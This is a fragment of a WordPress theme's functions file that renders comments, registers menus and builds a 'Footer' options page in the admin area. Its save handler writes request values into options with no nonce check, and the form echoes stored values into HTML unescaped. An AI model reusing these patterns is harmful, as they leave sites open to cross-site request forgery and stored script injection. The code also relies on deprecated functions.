		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
